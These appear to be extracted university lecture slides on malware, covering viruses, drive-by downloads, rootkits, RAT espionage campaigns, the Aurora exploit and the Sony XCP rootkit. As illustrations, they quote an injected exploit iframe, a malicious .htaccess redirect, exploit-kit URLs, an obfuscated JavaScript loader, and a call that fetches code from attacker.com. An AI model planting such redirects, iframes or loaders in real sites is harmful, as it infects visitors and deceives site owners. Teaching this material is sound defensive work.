CS 361S

Malware:
Viruses and Rootkits

Vitaly Shmatikov

slide 1
Malware
 Malicious code often masquerades as good
software or attaches itself to good software
 Some malicious programs need host programs
• Trojan horses (malicious code hidden in a useful
program), logic bombs, backdoors
 Others can exist and propagate independently
• Worms, automated viruses
 Many infection vectors and propagation methods
 Modern malware often combines trojan, rootkit,
and worm functionality
slide 2
Computer Backdoors circa 1958
 AN/FSQ-7 air defense intercept computer
• Largest computer ever built
• 50,000 vacuum tubes,
275 tons, 3 MWatt of power,
½ acre of floor space
 “Hula Girl” diagnostic program
• If you pointed the light gun at
her navel and pulled the trigger,
her skirt would fall off

slide 3
“Reflections on Trusting Trust”
 Ken Thompson’s 1983 Turing Award lecture
1. Added a backdoor-opening Trojan to login program
2. Anyone looking at source code would see this, so
changed the compiler to add backdoor at compile-time
3. Anyone looking at compiler source code would see
this, so changed the compiler to recognize when it’s
compiling a new compiler and to insert Trojan into it
 “The moral is obvious. You can’t trust code you
did not totally create yourself. (Especially code
from companies that employ people like me).”

slide 4
Viruses
 Virus propagates by infecting other programs
• Automatically creates copies of itself, but to propagate,
a human has to run an infected program
• Self-propagating viruses are often called worms
 Many propagation methods
• Insert a copy into every executable (.COM, .EXE)
• Insert a copy into boot sectors of disks
– PC era: “Stoned” virus infected PCs booted from infected
floppies, stayed in memory, infected every inserted floppy
• Infect common OS routines, stay in memory

slide 5
First Virus: Creeper
http://history-computer.com/Internet/Maturing/Thomas.html

 Written in 1971 at BBN

 Infected DEC PDP-10
machines running TENEX OS
 Jumped from machine to machine over ARPANET
• Copied its state over, tried to delete old copy
 Payload: displayed a message
“I’m the creeper, catch me if you can!”
 Later, Reaper was written to hunt down Creeper

slide 6
Polymorphic Viruses
 Encrypted viruses: constant decryptor followed
by the encrypted virus body
 Polymorphic viruses: each copy creates a new
random encryption of the same virus body
• Decryptor code constant and can be detected
• Historical note: “Crypto” virus decrypted its body by
brute-force key search to avoid explicit decryptor code

slide 7
Virus Detection
 Simple anti-virus scanners
• Look for signatures (fragments of known virus code)
• Heuristics for recognizing code associated with viruses
– Example: polymorphic viruses often use decryption loops
• Integrity checking to detect file modifications
– Keep track of file sizes, checksums, keyed HMACs of contents
 Generic decryption and emulation
• Emulate CPU execution for a few hundred instructions,
recognize known virus body after it has been decrypted
• Does not work very well against viruses with mutating
bodies and viruses not located near beginning of
infected executable slide 8
Virus Detection by Emulation
Randomly generates a new key Decrypt and execute
and corresponding decryptor code

Mutation A

Virus body

Mutation B

Mutation C

To detect an unknown mutation of a known virus ,

emulate CPU execution of until the current sequence of
instruction opcodes matches the known sequence for virus body
slide 9
Metamorphic Viruses
 Obvious next step: mutate the virus body, too
 Apparition: an early Win32 metamorphic virus
• Carries its source code (contains useless junk)
• Looks for compiler on infected machine
• Changes junk in its source and recompiles itself
• New binary copy looks different!
 Mutation is common in macro and script viruses
• A macro is an executable program embedded in a word
processing document (MS Word) or spreadsheet (Excel)
• Macros and scripts are usually interpreted, not compiled
slide 10
Obfuscation and Anti-Debugging
 Common in all kinds of malware
 Goal: prevent code analysis and signature-based
detection, foil reverse-engineering
 Code obfuscation and mutation
• Packed binaries, hard-to-analyze code structures
• Different code in each copy of the virus
– Effect of code execution is the same, but this is difficult to
detect by passive/static analysis (undecidable problem)
 Detect debuggers and virtual machines,
terminate execution
slide 11
Mutation Techniques
 Real Permutating Engine/RPME, ADMutate, etc.
 Large arsenal of obfuscation techniques
• Instructions reordered, branch conditions reversed,
different register names, different subroutine order
• Jumps and NOPs inserted in random places
• Garbage opcodes inserted in unreachable code areas
• Instruction sequences replaced with other instructions
that have the same effect, but different opcodes
– Mutate SUB EAX, EAX into XOR EAX, EAX or
MOV EBP, ESP into PUSH ESP; POP EBP
 There is no constant, recognizable virus body
slide 12
Example of Zperm Mutation

 From Szor and Ferrie, “Hunting for Metamorphic”

slide 13
Detour: Skype
[Biondi and Desclaux]

slide 17
Skype: Code Integrity Checking
[Biondi and Desclaux]

slide 18
Skype: Anti-Debugging
[Biondi and Desclaux]

slide 19
Skype: Control Flow Obfuscation (1)
[Biondi and Desclaux]

slide 20
Skype: Control Flow Obfuscation (2)
[Biondi and Desclaux]

slide 21
Propagation via Websites
[Moschuk et al.]
 Websites with popular content
• Games: 60% of websites contain executable content,
one-third contain at least one malicious executable
• Celebrities, adult content, everything except news
– Malware in 20% of search
results for “Jessica Biel”
(2009 McAfee study)
 Most popular sites with
malicious content (Oct 2005)
 Most are variants of the same few
adware applications
slide 22
slide 23
Drive-By Downloads
 Websites “push” malicious executables to user’s
browser with inline JavaScript or pop-up windows
• Naïve user may click “Yes” in the dialog box
 Can install malicious software automatically by
exploiting bugs in the user’s browser
• 1.5% of URLs - Moshchuk et al. study
• 5.3% of URLs - “Ghost Turns Zombie”
• 1.3% of Google queries - “All Your IFRAMEs Point to Us”
 Many infectious sites exist only for a short time,
behave non-deterministically, change often
slide 24
Obfuscated JavaScript
[Provos et al.]

document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20
LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A
/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o
%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D
...
3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E
%0D%0A
%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));
//-->
</SCRIPT>

slide 25
“Ghost in the Browser”
 Large study of malicious URLs by Provos et al.
(Google security team)
 In-depth analysis of 4.5 million URLs
• About 10% malicious
 Several ways to introduce exploits
• Compromised Web servers
• User-contributed content
• Advertising
• Third-party widgets

slide 26
Compromised Web Servers
[Provos et al.]
 Vulnerabilities in phpBB2 and InvisionBoard enable
complete compromise of the underlying machine
• All servers hosted on a virtual farm become malware
distribution vectors
• Example: <!-- Copyright Information -->
<div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">Invision Power Board</a>(U)
v1.3.1 Final &copy; 2003 &nbsp;
<a href='http://www.invisionpower.com'>IPS, Inc.</a></div>
</div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>

 Exploit iframes inserted into copyright boilerplate

 Test machine infected with 50 malware binaries
slide 27
Redirection Using .htaccess
[Provos et al.]
 After compromising the site, change .htaccess to
redirect visitors to a malicious site
 Hide redirection from website owner
RewriteEngine On 
RewriteCond %{HTTP _ REFERER} .*google.*$ [NC,OR]  If user comes via one of
RewriteCond %{HTTP _ REFERER} .*aol.*$ [NC,OR]  these search engines…
RewriteCond %{HTTP _ REFERER} .*msn.*$ [NC,OR] 
RewriteCond %{HTTP _ REFERER} .*altavista.*$ [NC,OR]  …redirect to a
RewriteCond %{HTTP _ REFERER} .*ask.*$ [NC,OR]  staging server
RewriteCond %{HTTP _ REFERER} .*yahoo.*$ [NC] 
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L] …which redirects to a
constantly changing set
 Compromised .htaccess file of malicious domains

frequently rewritten with new IP addresses,

restored if site owner deletes it
slide 28
User-Contributed Content
[Provos et al.]
 Example: site allows user to create online polls,
claims only limited HTML support
• Sample poll:

• Interpreted by browser as
location.replace(‘http://videozfree.com’)
• Redirects user to a malware site

slide 29
Trust in Web Advertising
 Advertising, by definition, is ceding control of Web
content to another party
 Webmasters must trust advertisers not to show
malicious content
 Sub-syndication allows advertisers to rent out
their advertising space to other advertisers
• Companies like Doubleclick have massive ad trading
desks, also real-time auctions, exchanges, etc.
 Trust is not transitive!
• Webmaster may trust his advertisers, but this does not
mean he should trust those trusted by his advertisers
slide 30
Example of an Advertising Exploit
[Provos et al.]
 Video sharing site includes a banner from a large US
advertising company as a single line of JavaScript…
 … which generates JavaScript to be fetched from
another large US company
 … which generates more JavaScript pointing to a smaller
US company that uses geo-targeting for its ads
 … the ad is a single line of HTML containing an iframe to
be fetched from a Russian advertising company
 … when retrieving iframe, “Location:” header redirects
browser to a certain IP address
 … which serves encrypted JavaScript, attempting
multiple exploits against the browser
slide 31
Another Advertising Exploit
[Provos et al.]
 Website of a Dutch radio station…
 … shows a banner advertisement from a German site
 … JavaScript in the ad redirects to a big US advertiser
 … which redirects to another Dutch advertiser
 … which redirects to yet another Dutch advertiser
 … ad contains obfuscated JavaScript; when executed by
the browser, points to another script hosted in Austria
 … encrypted script redirects the browser via multiple
iframes to an exploit site hosted in Austria
 … site automatically installs multiple trojan downloaders

slide 32
Not a Theoretical Threat
 Hundreds of thousands of malicious ads online
• 384,000 in 2013 vs. 70,000 in 2011 (source: RiskIQ)
• Google disabled ads from more than 400,000 malware
sites in 2013
 Dec 27, 2013 – Jan 4, 2014: Yahoo! serves a
malicious ad to European customers
• The ad attempts to exploit security holes in Java on
Windows, install multiple viruses including Zeus (used
to steal online banking credentials)

slide 33
Third-Party Widgets
[Provos et al.]
 Make sites “prettier” using third-party widgets
• Calendars, visitor counters, etc.
 Example: free widget for keeping visitor statistics
operates fine from 2002 until 2006
 In 2006, widget starts pushing exploits to all
visitors of pages linked to the counter
http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe slide 34
Exploitation Vectors
[Provos et al.]
 Bugs in browser’s security logic or memory
vulnerabilities
 Example: MS Data Access Components bug
• Compromised web page contains an iframe with
JavaScript that instantiates an ActiveX object and
makes an XMLHttpRequest to retrieve an executable
• Writes executable to disk using Adodb.stream and
launches it using Shell.Application
 Example: WebViewFolderIcon memory exploit
• Sprays the heap with a large number of JavaScript
string objects containing x86 shellcode, hijacks control
slide 35
Social Engineering
[Provos et al.]
 Goal: trick the user into “voluntarily” installing a
malicious binary
 Fake video players and video codecs
• Example: website with thumbnails of adult videos,
clicking on a thumbnail brings up a page that looks like
Windows Media Player and a prompt:
– “Windows Media Player cannot play video file. Click here to
download missing Video ActiveX object.”
• The “codec” is actually a malware binary
 Fake antivirus (“scareware”)
• January 2009: 148,000 infected URLs, 450 domains
slide 36
Fake Antivirus

slide 37
Rootkits
 Rootkit is a set of trojan system binaries
 Main characteristic: stealthiness
• Create a hidden directory
– /dev/.lib, /usr/src/.poop and similar
– Often use invisible characters in directory name (why?)
• Install hacked binaries for system programs such as
netstat, ps, ls, du, login
Can’t detect attacker’s processes,
files or network connections by
running standard UNIX commands!

• Modified binaries have same checksum as originals

– What should be used instead of checksum?
slide 38
Real-Life Examples
[From “The Art of Intrusion”]

 Buffer overflow in BIND to get root on Lockheed

Martin’s DNS server, install password sniffer
• Sniffer logs stored in directory called /var/adm/ …
 Excite@Home employees connect via dialup;
attacker installs remote access trojans on their
machines via open network shares, sniffs IP
addresses of promising targets
• To bypass anti-virus scanners, uses commercial
remote-access software modified to make it invisible to
the users

slide 39
Function Hooking
 Rootkit may “re-route” a legitimate system
function to the address of malicious code
 Pointer hooking
• Modify the pointer in OS’s Global Offset Table, where
function addresses are stored
 “Detour” or “inline” hooking
• Insert a jump in first few bytes of a legitimate
function
• This requires subverting memory protection
 Modifications may be detectable by a clever
rootkit detector slide 40
Kernel Rootkits
 Get loaded into OS kernel as an external module
• For example, via compromised device driver or a badly
implemented “digital rights” module (e.g., Sony XCP)
 Replace addresses in system call table, interrupt
descriptor table, etc.
 If kernel modules disabled, directly patch kernel
memory through /dev/kmem (SucKIT rootkit)
 Inject malicious code into a running process via
PTRACE_ATTACH and PTRACE_DETACH
• Security and antivirus software are often the first
injection targets
slide 41
Mebroot (Windows)
 Replaces the host’s Master Boot Record (MBR)
• First physical sector of the hard drive
• Launches before Windows loads
 No registry changes, very little hooking
 Stores data in physical sectors, not files
• Invisible through the normal OS interface
 Uses its own version of network driver API to
send and receive packets
• Invisible to “personal firewall” in Windows
 Used in Torpig botnet
slide 42
Detecting Rootkit’s Presence
 Sad way to find out
• Run out of physical disk space because of sniffer logs
• Logs are invisible because du and ls have been hacked
 Manual confirmation
• Reinstall clean ps and see what processes are running
 Automatic detection
• Rootkit does not alter the data structures normally
used by netstat, ps, ls, du, ifconfig
• Host-based intrusion detection can find rootkit files
– …assuming an updated version of rootkit did not disable the
intrusion detection system!
slide 43
Remote Administration Tools
 Legitimate tools are often abused
• Citrix MetaFrame, WinVNC, PC Anywhere
– Complete remote control over the machine
– Easily found by port scan (e.g., port 1494 – Citrix)
• Bad installations, crackable password authentication
– “The Art of Intrusion” – hijacking remote admin tools to break
into a cash transfer company, a bank’s IBM AS/400 server
 Semi-legitimate tools
• Back Orifice, NetBus
• Rootkit-like behavior: hide themselves, log keystrokes
• Considered malicious by anti-virus software
slide 44
Communicating Via Backdoors
 All sorts of standard and non-standard tunnels
 SSH daemons on a high port
• Communication encrypted  hard to recognize for a
network-based intrusion detector
• Hide SSH activity from the host by patching netstat
 UDP listeners
 Passively sniffing the network for master’s
commands

slide 45
Byzantine Hades
 2006-09 cyber-espionage attacks against US
companies and government agencies
• Attack websites located in China, use same precise
postal code as People's Liberation Army Chengdu
Province First Technical Reconnaissance Bureau
 Targeted email results in installing a Trojan
• Gh0stNet / Poison Ivy Remote Access Tool
• Stole 50 megabytes of email, documents, usernames
and passwords from a US government agency
 Same tools used to penetrate Tibetan exile
groups, foreign diplomatic missions, etc.
slide 46
Night Dragon
 Started in November 2009
 Targets: oil, energy, petrochemical companies
 Propagation vectors
• SQL injection on external Web servers to harvest
account credentials
• Targeted emails to company executives (spear-
phishing)
• Password cracking and “pass the hash” attacks
 Install customized RAT tools, steal internal
documents, deliver them to China
slide 47
RAT Capabilities
 “Dropper” program installs RAT DLL, launches it
as persistent Windows service, deletes itself
 RAT notifies specified C&C server, waits for
instructions
 Attacker at C&C server
has full control of the
infected machine, can
view files, desktop,
manipulate registry,
launch command shell
slide 49
Who Was Behind Night Dragon?
 C&C servers hosted in Heze City,
Shandong Province, China
 All data exfiltration to IP addresses in Beijing, on
weekdays, between 9a and 5p Beijing time
 Uses generic tools from Chinese hacking sites
• Hookmsgina and WinlogonHack: password stealing
• ASPXSpy:
Web-based RAT
Make in China
E-mail: [email protected]
slide 50
Sources say hackers using servers in China gained control of a
number of Canadian government computers belonging to top
federal officials.
The hackers, then posing as the federal executives, sent emails
to departmental technical staffers, conning them into providing
key passwords unlocking access to government networks.
At the same time, the hackers sent other staff seemingly
innocuous memos as attachments. The moment an attachment
was opened by a recipient, a viral program was unleashed on
the network.
The program hunts for specific kinds of classified government
information, and sends it back to the hackers over the internet.
One source involved in the investigation said spear-phishing is
deadly in its simplicity: "There is nothing particularly innovative
about it. It's just that it is dreadfully effective."

slide 51
 http://blogs.rsa.com/rivner/anatomy-of-an-attack/

 Successful attack on a big US security company

 Target: master keys for two-factor authentication
 Spear-phishing email messages
• Subject line: “2011 Recruitment Plan”
• Attachment: 2011 Recruitment plan.xls
 Spreadsheet exploits a zero-day vulnerability in
Adobe Flash to install Poison Ivy RAT
• Reverse-connect: pulls commands from C&C servers
• Stolen data moved to compromised servers at a
hosting provider, then pulled from there and traces
erased slide 52
Who Was Behind the RSA Attack?
 Poison Ivy RAT downloaded from mincesur.com
• Previously used in Gh0stNet attacks
 Some attack domains were associated with “fast-
flux” dynamic DNS providers
• Can rapidly change IP addresses to evade blacklisting
www.usgoodluck.com, obama.servehttp.com,
prc.dynamiclink.ddns.us
 But fast-flux DNS is commonly used by Russian
spammers, not Night Dragon attackers… hmmm

slide 53
Luckycat
[Trend Micro 2012 research paper]

 Targets: aerospace, energy, engineering,

shipping companies and military research orgs in
Japan and India, Tibetan activists
 Spear-phishing emails with malicious attachments
• PDF attachment with radiation measurement results
• Word file with info on India’s ballistic missile program
• Documents with Tibetan themes
 Exploits stack overflow vulnerability in MS Office
Rich Text Format (RTF) parser + four different
buffer overflows in Adobe Flash and Reader
slide 54
Luckycat
[Trend Micro 2012 research paper]

 Uses Windows Management Instrumentation

(WMI) to establish a persistent trojan and hide its
presence from antivirus file scanners
 C&C servers on free hosting services
 QQ instant messaging numbers associated with
server registration are linked to several individuals
• 2005 hacker forum posts about backdoors, shellcode,
fuzzing vulnerabilities
• 2005 bulletin board posts recruiting students for a
network security project at the Information Security
Institute of the Sichuan University
slide 55
Aurora Attacks
 2009 attacks of Chinese origin on Google and
several other high-tech companies
• State Department cables published on WikiLeaks claim
the attacks were directed by the Chinese Politburo
 Phishing emails exploit a use-after-free
vulnerability in IE 6 to install Hydraq malware
• Compromised machines establish SSL-like backdoor
connections to C&C servers
 Goal: gain access to software management
systems and steal source code
slide 56
It All Starts with an Email…
 A targeted, spear-phishing email is sent to
sysadmins, developers, etc. within the company
 Victims are tricked into visiting a page hosting this
Javascript:

 It decrypts and executes the actual exploit

slide 57
Aurora Exploit (1)
http://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit

Decrypts into this code…

This code sprays the heap with

0x0D0C bytes + shellcode

slide 58
Aurora Exploit (2)
http://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit

1. Sets up an array of
two hundred “COMMENT” objects

3. Deletes the image

4. Sets up a timer to
call this code every 50 milliseconds

2. Creates an image object and

calls this code when image is loaded

slide 59
Aurora Exploit (3)
http://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit

Overwrites memory that belonged to

the deleted image object with 0x0C0D
Accesses the deleted image

Allocated memory has a reference counter

(how many pointers are pointing to this object?)
A bug in IE6 JavaScript reference counter allows
code to dereference a deleted object
slide 60
Aurora Exploit (4)
http://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit

 When accessing this image object, IE 6

executes the following code:
MOV EAX,DWORD PTR DS:[ECX]
CALL DWORD PTR DS:[EAX+34]
 This code calls the function whose address is
stored in the object… Ok if it’s a valid object!
 But object has been deleted and its memory has
been overwritten with 0x0C0D0C0D… which
happens to be a valid address in the heap spray
area  control is passed to shellcode
slide 61
Aurora Tricks
 0x0C0D does double duty as a NOP-like instruction
and as an address
• 0x0C0D is binary for OR AL, 0d – effectively a NOP – so
an area filled with 0x0C0D acts as a NOP sled
– AL is the lower byte of the EAX register
• When 0x0C0D0C0D is read from memory by IE6, it is
interpreted as an address… which points into the heap
spray area, likely to an 0x0C0D instruction
 Bypasses DEP (Data Execution Prevention) – how?
 Full exploit code:
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
slide 62
Sony XCP Rootkit
 Halderman and Felten. “Lessons from the Sony
CD DRM Episode” (USENIX Security 2006)
 The following slides
shamelessly jacked
from Halderman

slide 63
Cast of Characters

First4Internet SunnComm

Light years beyond encryption™

52 titles 37 titles
4.7 million discs 20 million discs

slide 64
DRM: Digital Rights Management

CD Players Computers

Plays normally Restricted use

e.g. Can’t copy disc
Can’t rip as MP3
Can’t use on iPod
slide 65
Active Protection

 Ripper/copier
Application

Special protection
Protection software
driver that breaks
applications Drivers
OS

slide 66
Defeating Active Protection
 Prevent installation
• Infamous shift key ‘attack’
– Disables autorun that installs protection driver from CD
• Turn autorun off
• Use Linux, Mac OS, etc.
 Interfere with disc detection
 Disable or remove protection drivers

slide 67
XCP Rootkit: Motivation
 Content protection problem:
Users will remove active protection software

 XCP response:
Actively conceal processes, files, registry keys

slide 68
XCP Rootkit: Discovery
Mark Russinovich
October 31, 2005

slide 69
Normal Windows Operation
Application Normal Windows system call
KeQueryDirectoryFile(…); to list files in a directory

KeServiceDescriptorTable Windows Kernel

KeQueryDirectoryFile 0x8060bb9c 0x8060bb9c:
KeCreateFile 0x8056b9c8
int KeQueryDirectoryFile(…)
{
KeQuerySystemInformation 0x805ca104 …
KeEnumerateKey 0x805010d0 }
KeOpenKey 0x805c9e3c
… …

slide 70
XCP Rootkit Operation
Application Rootkit (Aries.sys)
0xf967bfa:
KeQueryDirectoryFile(…); int Rootkit_QueryDirectoryFile(…)
{ …
if filename begins with “$sys$”:
remove from results

KeServiceDescriptorTable Windows Kernel

KeQueryDirectoryFile 0x0f967bfa 0x8060bb9c:
KeCreateFile 0x8056b9c8
int KeQueryDirectoryFile(…)
{
KeQuerySystemInformation 0x805ca104 …
KeEnumerateKey 0x805010d0 }
KeOpenKey 0x805c9e3c
… …

slide 71
XCP Rootkit: Operation
 Magic prefix: $sys$
• Files
• Processes Hidden
• Registry keys
 Exception:
If calling process starts
with $sys$, can see
everything
Not limited to XCP software
Any program can use this to hide anything
slide 72
Using XCP for Fun and Profit
 “Most people, I think, don't even know what a
rootkit is, so why should they care about it?”
- Thomas Hesse, President, Sony BMG Global Digital Business
 Repurposed by malware and other programs
• Backdoor.Ryknos.B, Trojan.Welomoch
• Hide game-cheating hacks for online games
 Other problems with XCP
• XCP filter drivers intercept all CD read requests…
removing XCP causes CD-ROM to stop functioning
• XCP monitors all processes  nearly constant read
attempts on the hard drive, shortening its lifespan
slide 73
Uninstalling XCP
 Need a special ActiveX control, CodeSupport.ocx
• Getting this control from Sony is a pain (on purpose)

Client “HTTP GET /XCP.dat”

Server
CodeSupport.ocx XCP.dat sony-bmg.com
extracts InstallLite.dll from XCP.dat,
calls function UnInstall.xcp

 ActiveX control is not removed after use

 Control will accept arbitrary URL
 Code from that URL is not authenticated
slide 74
Repurposing XCP Uninstaller
1. Attacker constructs Evil.dat with InstallLite.dll,
puts attack code in UninstallXCP function

2. Victim visits attacker’s web page, which contains

CodeSupport.Uninstall(“http://attacker.com/Evil.dat”)

3. Client “HTTP GET /Evil.dat”

CodeSupport.ocx Evil.dat

extracts InstallLite.dll from XCP.dat,

calls function UnInstall.xcp,
control is passed to attack code
slide 75